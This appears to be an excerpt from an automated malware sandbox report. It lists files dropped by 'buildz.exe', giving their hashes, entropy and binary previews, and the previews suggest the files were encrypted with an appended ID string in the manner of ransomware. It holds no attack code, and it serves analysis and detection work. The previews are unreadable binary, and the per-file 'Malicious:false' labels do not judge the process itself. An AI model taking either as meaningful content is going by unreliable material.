                        SHA-512:E736F77EF63E2955050C5A5F6FCDE583BDF26941C127A906087E6E76822E30CC8BE030F58D174E20074EA253B9977D6831B9927FFEDE7ACA32A5F01A2F634910
                        Malicious:false
                        Preview:<?xml$.y..}`.>#&8.j0..$F...|...R8;^R!W.0Z..N..-..31.M....h\...+.... ....{.........R<GK_.F.&{.ac.....*....Ah...>/..(..1...;.RF...gM.E....\.vjY.<e.r.h..T.4.S..K.t..j....C.q..a....yH.h...7.2.?c._x.....ko...,-\..R3...t..ZfZ{..^?.^el...`.UMs.S.~@=(.4.#wYU%..Fa.........P~..`.9.@o.o.Y...oR...~.4..L.......,i7...oX.6..:/:m.H.....-QV+E.........c.....t.LnR3[$Zbz0....S.....C<3e..4...F.sa..W\.....b..!.hg.s...^^..v...O%M:.3..^...........? ...$.A.l.....s..t....I.\..W@..bLK&.9.Q.....:oq.T13:..0..L..p..l..E.......*.C......>..R.:...w3....)M.:............'.O.k..*........T..Amc.Q..#...M....1...oQ}._.....g...e......:.,.g.?V&....Oi.#.24+1/..<N.....{..9a..Kr..&;..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):827
                        Entropy (8bit):7.731191421008416
                        Encrypted:false
                        SSDEEP:12:AfYvz0n0PxGCex1Mg+101u5Zk05GDfy2cjrMQxNzMVPaPa0dve/26Gcii9a:AfYG0PxGCexC+10asgfncvxNJ5eHGbD
                        MD5:AA7B926E27049F3251BDB6A660ECAF72
                        SHA1:704C74A71783D684669561287E182F2BFD0CADA7
                        SHA-256:096D6D081DC7BBA96079604549083D7E4F76DA803FA45790ACB70FBDBA4FB422
                        SHA-512:324CEF998AFF5A8D6D42E25DA5873B42129A8FD9668840E662F557D29E6AED04C18B41ADF37BBD9DBCBA6BD5728254A4173D4ED41E0241819F34106567CD7FFF
                        Malicious:false
                        Preview:<?xml3[Sg..o...t......I"L..|#...q...zo.u.B.#...z|....6....d.[..a.J.!:.U.A.9D.}JZ.E<0<.Q..........<v....}.n.&..o.]#0.-.|.[1........L..).g.d.!~........zD.@..rL0kh..........7Wp.Qz...v&.D/.../.'...3..YLy.`.J...."_xW.....`.PfM..p..x.[....r.H....*.g....\..c..6..S..@C*!...4....cH..tFI..-=.DvL@..1..H.&.Ama...F..dXqJ....b...+..d2...j..c.6w...D..G.Dg"..8.U6........Zc...[g..I9@.G"ti..l.......j..c).Q.;.E /VL..6..#..`y...w....._.hUu..F.).m.q....0....2y%...d......f.p5V~tHX$!.R...Zh.p.=Ua]..a...G...'.....4.z..\..P.|0..NP?..,n....K=..;Z?...`#...eV..8..$\.d.V.(....5-.Uw..g..7.Jkz.k.h..&~p.......h.I.a...........E.Z..Nso.Q.r.._..p...h.6..U>.......E..:..Hj.....r%..|..C.9....e...FJ>...G.......;.|a.T9...m8....3=~......*1...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):753
                        Entropy (8bit):7.692768538176777
                        Encrypted:false
                        SSDEEP:12:avacQIddY3DEEPDUnyuiFpoU2+9mmVXn/EosqEH4LgPklRezqVRj+r46z26Gciik:wjT7WDtvhTotemqEWEH4EclRegCr467A
                        MD5:B4FFACE4F3B6CB9B4479D4DE1BE2F875
                        SHA1:DA3EC8AD2963466BFF96B8D573045875E4481BB6
                        SHA-256:0F443BF17214330826ACB0191E268725D275A2DE41239004856068EBA3EA1F94
                        SHA-512:DAA771531DEE22B3AE39EF7F6429F8B6E32316A4EC548A4C3D02FF9175A6661BDDC20B5DB3514003D2BEF5CEA6EB6C2996AE5C33D29C6F7B97916CE0EF1EC77C
                        Malicious:false
                        Preview:<?xml7r..(.U....kg.)) W*u`....J~vp.DE_..?.Z..6..MU.x.4.|..,..4...@.....-.....#(K......s..k...G>..k*{.d.y..... .Vz.]...6.Y,.w...c.IK.L.D.>.2&B/B:]....f.Xp..Y..2.8...L.=...$0.>{..Gym``...`.;....?..I!1&....)x.......j.d...%.D.#g....?.D.o....m*/.8lR.p.._.....U..E.I.~4.B..IJ.Y[@..$..a.9.)u...vP....(......F...3OV%.>...z...zT..9x.....qH...]..;\_l.^.2..|s@..H.[a..t.....:|24.;.....n.w.d-......./,.B.Y<.#.....xLW...E.n.}.......sS.. kL.9.F....w...b..DE.!...:E...u_....E..'..,.u..4...."l3:.......k..7.u..L./Jr.;.78'CF..bYBF....t..l..C5.t....}..{.......:nSU.[.#.T...z.!_....e..U......,..?.....f.&...\._XCL..iFhY..6\8T.....4..+sI.S.. ..&J.....V..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.715821265818492
                        Encrypted:false
                        SSDEEP:24:ymcnKVfRta13r4zG0TViA9INOJ9CAe2GbD:Bcmy1bejl9qsCALUD
                        MD5:D0423DBDDD9C6723C5FDF94BCD28D8E2
                        SHA1:8F6B9DEA8F71BDDEFD0FA022AAB3EC0EAEE5CADE
                        SHA-256:A6F40A61CFA5D23E27A530A3D8B8E5AB2401D8545C8597EB0A0FD7366C083A56
                        SHA-512:2E88D9B9B3087E5027318AC7C54591785F4D253BC22FDD11467825497347CFFDB254A8F69AE9D7F65A87142A6E9B18767A16FD386D3AF679FD554E6F922B1E81
                        Malicious:false
                        Preview:<?xml...;%...I$..n......>f.Q....J.....N!]|y..A....D....<Q....D.v....:O..yp.3..w...p>1*v..xs..).....Y..gp_%........6......[....].....B........dj..]..1k..F....&.u.../....x.c..z....r..}#...'Q.F.........&...B....D.>xoy..^......o.../z..._..?..d......6..u>..+.B6.....C--{#..1......U...A............8t...&f..}...>8.|D3...w.*..l..Pli/..!".......Q..f.......!.E.%...Z.....a*....[o$cF~.R+...B.....U...UIN......"PP....U2.HT..f...<.[....<.C....f..t........WV.......L...pvT.....T&..m.d.ERx.....W.oD~$3......N........R.Q.....3..m..A...)b&Y.1.'..}.Y..v.u...@"N..[.j..D.._...E.....W(.#D[..<.&\..i..zh..GJl....;.s...%.R.@.q.....09.......@..m|i.*Q......N.....;..7..U6.1...y._.n.G.5..0:.....}.S.ZEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):760
                        Entropy (8bit):7.716316524954911
                        Encrypted:false
                        SSDEEP:12:ym5RHS3pyc7zFt3sEAXMu3US2sjonzHb+1Vm4UBlgIFckkG26Gcii9a:kQc7P3/AXMukXsUnXqmdDbFckkEGbD
                        MD5:46C9DED2304A75C2E12CEF488829AE95
                        SHA1:90D4BF3D104CCD94BD9A39333AB748028459433C
                        SHA-256:926A56A54DA30934B3A5AC10877889BFB0E497CFD68E4E801F148BACF0E26187
                        SHA-512:E809854C8C33FACC8C8EA7CA522EF2149E20DFD9321F18AD0DDFF40AF609491AE525E3EE229F5DB99ED318281BBAFBA296A3B374E3204BF98972E5B2473D5B7A
                        Malicious:false
                        Preview:<?xml?J.%J....8Q.......o..bw....m....IrQc....`.......P.......Y..0.6.]..Q..#.!..8L..|..|:..,.....P..@@.*.....iK.....m.../I.f..<.::b...C...:..z.`.j.I..`..gt`e...3.0}..LlH.b.....l.B.|.+.u.{......^!...|;0.S......4XX`....V.f..4..n\.;.#OH..Q.,.dR..i]>..#o;>.A./s..$xF.!_Y.)W X..v\ ..x...l.P..J8....V.0....x.ei.....1S.t...,.Q.....FO.t....6a...=t5..]..Yj/.....+C.\....S..m.......Df.G.[hQ..R.oT^u..P.qH...7>..bRX...jy../...D..(A...k,...^>^t...t..j.H[\.........`....*J.b..0....&-VC..A....fZ].V3+.~|..5.....aT...t.....!.T[.]<Q.!.K.L....7...%.2..g+J....vdG,.].....A..P.uF.......zh...6sAR........V..........,$....d/j...}%.x.p...... ..........."EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):819
                        Entropy (8bit):7.726697677390906
                        Encrypted:false
                        SSDEEP:24:+dXyro60GC3089Nf8M86ZtMl/wM9CWoGbD:+kbP3gz8iyVL9CWoUD
                        MD5:96C1C98AA809A6B53FA706C5B9A99AD2
                        SHA1:404E35D2F76F8C9CB73973F774F8B33675C8CA52
                        SHA-256:E65C5B0CAC4B86D18D09B39CD553C5DF53239FE16EC4DA4DDF8A9BE9C5BBD07B
                        SHA-512:B7E5F92C744DF9B88453ED725B36DEEF7F9F8359F0AE522543976CDF49784DC7FFDE3D4948EBECA16DDA9E44BF5885FF2517A833476F28B9622A8807206C0891
                        Malicious:false
                        Preview:<?xml~.,'..R..SQ.gX<...j.>.B].r....WG..C.........[V.q....(Y...N{t.].....D...IK.r...G...a.3E.?..x\.........,....<. .\.4.....7MJ..5)..b...|C......;..F.9.....K.-.WS...o.KG].....<f.X..8*.1.m..S0V.23N*Ru...9L..^....R....T....]u.........%.>....%eb.Cx....Q.%.r.G. .....t..4..a..Cg.........D.6...4>.P...."gv..Ja.`...h;L...I..Se.j.wfv...P..#._......l..-;.....O...@@a.J_!.......w1..X..wE.#AO...A.`.;..>..z~......Z..=...RDe.B....y.2.h...V.......o..A.s..~..J.A....2...a1Yw...fLQ.!S...K..a......W.....8.Y/c^DRT..;..?t!W..2.@.g..w.f...W..,`..k}...~B8T0.....Y.U.dV.......`..w.#~.G...g~n/J...V..l.;~.f.W..U.v..+!h^.}..aJ...{....x\......-.UR.@.IZ.....t.:..[w0Ch+..M2...8-.W_fqD......:.....-X..:.\.F..F.R.}.i.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):756
                        Entropy (8bit):7.64920819928014
                        Encrypted:false
                        SSDEEP:12:dX/aGD+OOH9//4xaWp/OtDMf7LvpAOqD4nLvbvKKz7pPIFWaWlFrSc8X5hlt4m1j:dviO84HpmYf7Lhd7KKz7pPNtrb8J9h7N
                        MD5:22A72F642A1A947B4301C09364D2E4BA
                        SHA1:1E1CEBA9352D736E48730110E7E75C7C1A9FC39E
                        SHA-256:47485FBA8162FCA2FD607FFB587B34AFE2C3F6E0862A0397675D0046A771E805
                        SHA-512:F21BAE8E754FA44AB1242C3B2A4CFAC9EDFE3B02E2D9AB3177A75348F06C28F951FD54755F5F85A7F86412379136442D5BE144708A14DB45E447CC0F4B4AC0EE
                        Malicious:false
                        Preview:<?xmls...rU.Q.....j..K...G.?1 O.....r..&....5...^.F.V......4...(...Z.~_.....0..g...&M.......7..<...d.t.....E...o+.....Q...l{..v....TE..!...vg....<...GRX...p...vnH)...!m'[.h.Fhgq.Ja.....n.yCA.. 1...b.`.}.y9}.gB....D`.".}..!g:?...O...Bc....h_\!<.9..uF.$....I._J.....L..d.(5G...2..|..q.Oz.Q.=.t/e........pWB.^G..@`..*.`.3..I.).v09?.viZ8....;b.h..a B&.'.....m.h.~.).........b.'..b`d..6.kC.[....A......G...D.sU..4.r...PT[...&I6Z....!..QW.o.w....n...u.......4.M:..0. a.$.a%...:.Q?..b.....A.q..:q.U.......8. W.<.HH.V..G%l...k.GoK.:$1.~b.'k../.n]....c.c.a.F......l.|..,y6.c &.....d.0p.d-iD.e...p/)(^.x1!.UV.........k..b.!...j...A.%..Uj.*g..Krq. .....'.5....}.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):811
                        Entropy (8bit):7.680584313885273
                        Encrypted:false
                        SSDEEP:24:LoQAeI+OXpK4DD8IXb92knD2RDQZx178GbD:HAeI+V+wAn2C78UD
                        MD5:486A9F82C3BB58DC113FD449F9D09D88
                        SHA1:E57734152B307D6ACB2CAAC965416F05A91D92A2
                        SHA-256:9F2B26D98708ED6E0228B70F3B684AE0E225805BB6B9FD84DAB729B80C7563A1
                        SHA-512:D255D92E28C9E01D138C32DAD5475A530B733FE9853B601E8A0D83D509A092EF180A3644FDABE8AE6BA020B166EB2FF0708AB3DC00BE9445F09E1EB55E784AFF
                        Malicious:false
                        Preview:<?xml;....sA'F...y...x.!.G$....#;.../.+..............RO,..F..... .:......;.#i..G....@.q...UH6...7.3.Zvq7.h..s...5.P .....U\$4ft..+..(BxJ..2.E.!|.q....Xpj.#....m...L.k....Bp.,S[.'..zH@..%........z..;.>;.kp.^.[....V.o..OI..+...2i.]'..w.OU./..$8u.....,V.O...f...9....Q...No...+....UP<1....hp...G\H.P..q..}.7O.2.H..3.P......3.fu.#n.-..sB.$.>....O.(p.L`..[.I. ?IM.x.#...V...j.|E.+.8.....^.xC..m:.....\0.DG>..-o...............*.Y..K.}.5..o....>..:Z.\.........d./.*...@i.o/j..{.p.U.Bw.<..E?...?......_)....'.ON...l......p....d..s....LA......S.C..2...a@2..}+.&..[.Q..-b.'S........Q.........jq..X.p..K.9n...&.0.'.c/1...[..;V..A....k.b...kK....m..#..F.....n..F.k........m...p...U....&........N.p.n.......V....8YEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):737
                        Entropy (8bit):7.638879189770006
                        Encrypted:false
                        SSDEEP:12:Ek7EnIbOZ9MaK+uZvWXcQX1/Z8rdO/63WMtVw4jFoZIdYr026Gcii9a:Z7g+OPbMWMCZado63VaSeGGbD
                        MD5:8C86B8A2675AE287265BA3412D1C03C7
                        SHA1:B0B606DC45FA5C11516F566A14243F21D9D1B941
                        SHA-256:5D5BD2E202B7B7E54E39AE3E0960DA95C6610E8EF1AD61A7A07FD6AB44AD6D2A
                        SHA-512:B3D6683F0ECD8283C26522FCA08A85C03FF18C66D6A46DA7098DD2478840B57A521E57BED0C97C3BB6B075C55360D46F6BA957FEBD94729C090B3C46529D12EC
                        Malicious:false
                        Preview:<?xmly..NQ......-...lT.........B..Q.j..E.@...];..ZZ.\..&......:..*.R.}...xD..........z.s.....@......<..&-.T..p.)......B.....E....-G1..b.....<>.O..i....q......|H...:.#e.2?.Y...aq..\AbT..H...&........}.R#d.Q-.`......fD%..t..!D.......?.w\..?c.s..P.1}72Q.X..&..j,\.WdQ...ug.%x.....P.AdE.)3$.6v...M..ke.......)w\|.@.).K..'.../.M......#-..e.{...S..:...w}..S...V@7..$...q....?.y........).......2.?.)..p...#z.m<..l,.i.r....TvP....4..u^......M|.Fo...Y.[-@.t8e..$q.C...d..U<.....P+l.Ux...bnX*.W.;CQ....D.\.a.*.<I...X.+.$....4<Ua.Rp...s/.1`N.U...M..YUO(T..n.tH.i....}....."i.....M..U..{.s....6B.Cp.S4.5..'X.....D.A..J..FL._vC.....(..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):801
                        Entropy (8bit):7.71456984881071
                        Encrypted:false
                        SSDEEP:12:TKEkUp4pUN0R2j4u6Jtme3UEcRBzJl6AjvhmNTgDWOWzXZXKsQzZrYR7hZf6nc3r:TKOpP/j4u6nDd+Jl6AbWI87LwZ6UHGbD
                        MD5:67CC8507F28254D11148ECBCD27F6872
                        SHA1:33F7C7D9474584A454573DBBDCDA9295B46268DF
                        SHA-256:9CDE10FEDA0421B4692D52F99169AB9E6E87CD4246AC178F39ADF34B91768117
                        SHA-512:EC963A8E6138288FBA63779D299B1D173F2544985924E7F74DC58475955A6ED58E462A77AF7ABE040DD2CA14BC04E3ACA541ED95DF7280D9CDDD14E33CCB50B6
                        Malicious:false
                        Preview:<?xml..YR.<Sj;.cW....oN....hV..[....c.D.1...G.+.qd..<.+...L0...BdYk.~j..(.^....:.....W..q...6.7..Z.....2.gJUxr..MW......ki,A].t.f9.@...V\.....RMux.[.q .4.C(....*..Z.e.E.h.!.A{..H`...=7...x....?X......xCvRO.,o6B!c..W...=I...!.*. ].O.Y|...k.".LsM.........>D..%.,.%y@..A(?C...Q....Ld.s?r1.S..<'....8...|.o...$..n.$...^.'QX.gY<W...T....]s;z8N..F....%.?....|.B....=.@d...[j<z.f..=x...+..\I......c7.R.cYb.......^..I.S..b...K....y.\vM}o..E}....zZ7V....)..e.r....2.....&..hY...N..L.%.$-.WL$..-.... :.. .\R.q...0......{7GE.!.o#..-...x(....W..t.......d.I<..%.........."..*.....].[.$.w...^D....6.....*..K],..2..XL.ac.W....-....>..Qf.P!...26....8.H...Lz.!.y.:.@.A.|..m.ws..3|5y..Q:.5.y}w........5.K\.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):733
                        Entropy (8bit):7.69746967674737
                        Encrypted:false
                        SSDEEP:12:JLdS8K0gYpU6AHOCM2cHihlXTAb0lEr2hD/+yiIC+dNhlsS2RVxL3mdil47s426A:nS8K0v4HrZcHGlXTAQCr42y7vnlsS2z1
                        MD5:9125B592674397499FABE37451412D37
                        SHA1:91160F948795E3EE1951F078BFFF7F64943ADDF7
                        SHA-256:21E0255C84C62A545B57E2ED70177C3E5BA69A13A91E3E1B3B5FF2CD02DE9080
                        SHA-512:10783884F2643B25F95EE348BD3B4B3853D3088E6295F951AE11252B34B7646A1610F4C6D609679D1700F51FFE730E2C5BCA2A7F629DFACB909B6E25465D5F83
                        Malicious:false
                        Preview:<?xml;"...........i............L. ........n.H..|A|%.........O..5..KU.PN8.Nj.=..Vg..p......m.M"..M..&..|.L.x...{.M(}.^.?....*.f@{pSs.....j.....@.....#.M..L.i|%1.ZC..b.....c..q.x.&..p./#<}....$.'..$....X..C.'..2.v.{...@.....'..f..s.......|"..........@.7...C...B..qE...:..X .......f..rO.o.i^......x.e.d..y./..9k0.E.g..>......w.-..(.....|.!.6k.O.....G.."R..k.h/.,.R....D<r:.C;.....n.l.*j.....tZ......o=l.3[P.L.....h.,...a+..d6.@.....f.{.k.C*.......)..N..F..7ge./4.;F../ .....RI.a...f....o.d.~....=..A..Z....$LT..\5......{..];*~...?0.?.Jk..|...,.......*....|..O.x`1R:....u9S)ep...*.V...\../.....c..D.-.p`.>~..RM....".1..85-EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):812
                        Entropy (8bit):7.7275541339232
                        Encrypted:false
                        SSDEEP:12:wRSRgaWJIYY1fXcQGo7bH6hitXAvof1ttILsP+3pEmcEylwYnPNW2k626Gcii9a:w4RFx1fsQGgbH60tXWWt+YbTW2xGbD
                        MD5:61EA28F566E205DB5D6C31009AD74474
                        SHA1:C965BFFFCC9EC5CDED8D81DA0BDE0B31A06766FE
                        SHA-256:F46F4BCAB6B5218975E656ECC2315AD2FE08F9FAED47C208E763C6089366A303
                        SHA-512:1E4C4B3E4A3A143DFCD688D6DE917A13AFD4B0DD7A80B4CCB4F499850CB73621164227BECA6B2F11CE696F58D99890C8D56C361E4ADDEE4D1DBC742EF8AEFA6E
                        Malicious:false
                        Preview:<?xmlM?...m...=.<...\...$Q[1..h.V,.a..T:..g...Zm"..W.....N..q...~B..G......|[..O.q.f.....-Qb.. 0.c.L>.'......p.0..n5.t..c!...}p..............k...X".y..........H..k...............nk.{.!*...;Z7...+0.....kdS..w].{......#e.0.'O....f>py~....n....5)Q........3.lnX.._.NP...Lx......% XX..........#B...q^.=..b..q..-.....#..3...A.......u....,.b.(D.y`2.]8E...7k.(...._.K.3q.$.`S...W.6pH3.X..;.ZFuA)..4.u.~"..HR.e.y.d..~.V..c.);..J...m..:.sl.>`....e.v...z...i...q.A.5.....gL3g...E.iZ..4*+...%.][.2U.H..=...ok).d8..{?....../.k;.OWW..K..)$1....?.~.L.3....F....l.p.Q..U.....I..12.v._...y3.....O..).$W....C.>...s...bt.z/.*.JJHq......@R2;.hBc.R....j......g.?w...uj.0.b.....[C9.....O....;......`..|''.ZV..O......[.C..-eEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):758
                        Entropy (8bit):7.675362378943451
                        Encrypted:false
                        SSDEEP:12:Ei7/JH3iqdE3kagoC3bSenUuphHn7ywmMjmx1Al4WDOGA2lzJdnzR926Gcii9a:t3RXrtZhH7y9xGTD5VlzJxFZGbD
                        MD5:8DB24200C1419C950F2C6961B891F388
                        SHA1:AF9A64464145B0E7C5F832A76AD016E1263EA1F9
                        SHA-256:EF1E2239E4A7FBDD6D9751454593D69AE5AE74C8A140FFF9E75B99D6402F933D
                        SHA-512:57ACE0CA4A8645227758D442373B645DB144BBFD96B1DFFA8F4E9A07C3C3438C773221E58FFB96E6EBB1379B03592570D2D5D0A115CD010DE7EB4C23B62C1BAD
                        Malicious:false
                        Preview:<?xml..N.S.z......e*K^....N9z.z..r..).@...A.....S...})D.....Xg[W..7...Z.k.z....z.f..!.._:7.5.3...!h.9[.:.y.=.......7..........T.8. Nx..*..NJ..;...T.D.r..E.-.;.C...I.j.-.B...4W...|...;^......S~......s.^;d.8r..U.../.....S=@|fZ-..f...3E..)...(a.2%....*r.!.y..!E.y..k.,{&,.X<..G.o..J(S...:.%....).oG......._^...MQ...zvr.0LJ.......7...QC6Cd..xJZ[B......":.R.;+....E.;e.o..*.M&4..UO......bavRAi2%K....i......S..m...B...3&.....3...+z..9.....&..*5-A.r....t.../i ..m.....Q...........l..(..Il.jMr..L}.w...8..].-.}.R..K.. .Xw.H.S......^..?.....x.ef.....=...@.:l..... o....A.rO.%..h...`j'..l..;>....q..s0....q..,W.3./......A.....,W .4....T..H....!..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):808
                        Entropy (8bit):7.733508082215825
                        Encrypted:false
                        SSDEEP:24:0+1SHh04L3UB61r8V6jrlg5u3ojHelSkGbD:FVwEB61gAFS1e0kUD
                        MD5:C1878BD9C6CB5E065E05800DD54FCAAF
                        SHA1:779F3F8AF9FB8B125BDB57893B420346745B533A
                        SHA-256:43E498B56B6FD81B200A846851E1594F53DECE56D39029B7C032C666B5FF6654
                        SHA-512:EC265BB9FF68375D9C4AEC5DA51DB6B8661B4E7B1D0D4039DC993E8A7BA4698AFEBD8DA974709B4EEE755FD55E44516138DCC830CD9BCF0F03C3A30B1161C860
                        Malicious:false
                        Preview:<?xml[3.......D.."w..y..Xo..p..%hV.8...~g..}L$.....ct..P...K.Vy.:..V.......$AY..Y.9$8....6uind...~.I......j,.Qf.O...c.....fjt...........M..^u......3..ig....R..J..ia..D.UjJ....O.D..Z..X[t`.V..&z$`......p.cq...I.(zcB'.7.L....=?....._.;~.B74h.|r.'.^..x.v..W........^<....3i.Q.......zw..2..9)..?.$.c.....@..i..:.....,.......^....m..a..`...j.&.-.,e.<.B_*:V.I......:E...a..B.......K..M.(.6.z6.%..,...[..kg.=..X2.0.Z ...@...6.Q.............q;Q..2..K.ju.Pky...{.;D.&...E.BH.....Dn.\lQ..4.df>....@8..=V...Y.......j..;...<..dU..ck5.0.#.....!.......|....X..+8..v...L\_..s...p?....WO.BV.R4.4@...R.'..,..i|.K:..9.j...\.L....hbP.b.;......e.p.../.)8.}..$[.#s7.p.r..A..A..)B1.{Nm..X.ap...;.X..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):781
                        Entropy (8bit):7.687098997175865
                        Encrypted:false
                        SSDEEP:24:g3/S1gcP3KvUSpAcKrG8e/mDKuAWk+vrqQOMzmROYGbD:g3/igcfKfYYsAt+jqvrUD
                        MD5:3523DBA8CEFAAA4283A47604EDACD151
                        SHA1:476233B1EC7D04DB42ED524B11440C3211281209
                        SHA-256:76AE0D66F059D64E85175AE3247D2AF00E2DA460EB12871CFC63AA84F88B7F30
                        SHA-512:12A89B1ED814BCF49FB07D5B629A4AAAD2C18DB3FCAA6FA960FF994029058583A335C303D98BCDC6AEB7CC403AB120282D6E4F0D9CA8A0809DEB39E2A4AC60EB
                        Malicious:false
                        Preview:<?xml.......S.N5......."BC.cB.z....}T...;.Or ..wP.r.Rf.i..j.....6.2....A....f.....F$.0.hA..M)..a....}..&tz.r.V.}.:._...j.e.3.1.,.....D.....|....I|....u..W./..?.......Q.!.PK.1..K.H...%.[.Kh..S.B.e...Q...Yl....c.D...?5....L.....0.....uWw..r.:i}.^.?.:.!.N....59.......[....>.0..V1..^.D...Cw......s})..^...."9.....y.....J...}.....'.p.)V.*[?..y*.=H *.#q....O...W..XK...R.L..........!$@o$...J(...x.]RD.J.`fH.w...8......jS...'}.9...pU.!!..(,..,k.i.28&... ....m.....A.ETC..ke..8. .W...]'0..9...2..8.....0.]......P......:...8q!x..5.H.[..y.^...E..i..'.4..V....4.G.;....HS^A.Q8k....bB..J.........|.Jk....%.D...=......)Qq3.!...........`{...U.}..................1..X.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):824
                        Entropy (8bit):7.7379978962296985
                        Encrypted:false
                        SSDEEP:24:2Z8Dn0s4VIaJFTu31MUoTNOFMc2O8t9oyfJfGbD:2M0ZIaJFKMUKNOYO8ppUD
                        MD5:DF13104D8CCFBB4440F97DBD5819D1A4
                        SHA1:C1AE3F3925F5E27B09F418326ACFAC465DE2823C
                        SHA-256:F789020CBD02BD3F9B272DF6799F13AFC94472C3D17155C4CA58B607E3B1BEF6
                        SHA-512:B2B0EB5864AE3A0AACC977B4DD28838065797CD5C26E8E1690AE1EA64F83CFD52BAB81D75D6212AEE5106CCEB7AAB61ACEEF24700F3F143DDB6FFD4A39F5B915
                        Malicious:false
                        Preview:<?xml..u}.....>...|.i.5@...YK....E.....U1.I..#s.../..\.O..K.&@.;..S.'$2...2.b.~....K.!.E.?4.C8{.D..Y...P7.....s....>q..J....Z`.$.v.K.P.c.&W...@.-.m..[dI....:xY/g.KNvi.)......2...fA..C..w.~...:.......p.aV$...,.hl.....M...%.:.W...X...!C.cg...9.......2....Aw.jc[.t...#6\..|G/...]...;z......].'......=..de.t..0..=...._..b...H.t.%...(.J:..F=N..|g.L.B.f.....x........WA...z.....y...+."g............2.T..!x...O..3.@.r.Fb.....+.l....|4X...K......t..>..l.dy#|M..C]/.d..1..J.V.-.,).L...k...DoNM.lQ&...[.R.q..v...3..A..?l...W..s3.".v.U.(up...5.b5.'..2...h#G..+..#.Kn.+..m..../.Ry....*hp.N...&%B@...T.........(.c..4.8.(F*,.,...!..>^b.:..~3.w...wG ..y......?....A....>..6f.4...\..4.U.U.?.Y..K.c.|h0I\..^..V..C?..p..x.._.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):749
                        Entropy (8bit):7.692322724638177
                        Encrypted:false
                        SSDEEP:12:bFWJ2QGhq4N5/ryewvncsa8BNvjhuEtaVS+JPJ2uDIO26Gcii9a:buGhqY0vncVEwxlDIcGbD
                        MD5:D7BB7A04EF406D225F9D27B6B7D1333C
                        SHA1:6E82106F8DD8FB3D40B49521722949B7E96AFC75
                        SHA-256:60F7D47032A36922F347A426B0E7F0DE08143CF5E7449ADE6314E227E57FBDBB
                        SHA-512:84218669D2406014D6A6C6A2C383ACFC57A6A112EF05462AD3B766A98D0FCF5370DA9A02E31523F805A40BE67179CDA312258F0619BFBCBA87C992ACB34C26ED
                        Malicious:false
